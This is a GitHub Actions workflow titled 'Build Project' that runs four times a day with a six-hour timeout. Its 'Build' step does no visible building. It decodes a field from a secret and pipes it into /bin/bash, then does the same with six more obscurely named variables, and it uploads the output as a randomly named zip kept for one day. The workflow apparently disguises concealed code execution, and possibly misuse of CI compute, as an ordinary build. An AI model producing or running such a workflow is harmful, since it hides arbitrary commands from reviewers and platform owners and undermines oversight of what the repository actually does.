name: Build Project
on:
  workflow_dispatch:

  schedule:
    - cron: '30 1,7,13,19 * * *'
permissions:
  contents: read
  actions: read
env:
  CI: true
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  operation:
    name: Main task
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - name: Checkout
        uses: actions/checkout@v4
        with:
          fetch-depth: 1
      - name: Build
        env:
          iw63: ${{ secrets.iw63 }}
        run: |
          printf '%s' "$iw63" | jq -r .xdnzq79563 | /bin/bash
          echo $d93713 | jq -r .wwamk6 | /bin/bash
          printf '%s' "$zf15" | jq -r .uchn7 | /bin/bash
          echo $b8 | jq -r .jxol918 | /bin/bash
          printf '%s' "$npvl72" | jq -r .kjcj6 | /bin/bash
          printf '%s' "$rnr001" | jq -r .ciew84 | /bin/bash
          printf '%s' "$udm1" | jq -r .eyx69 | /bin/bash

      - name: Archive output
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: 595MbFPA
          path: "*.zip"
          retention-days: 1
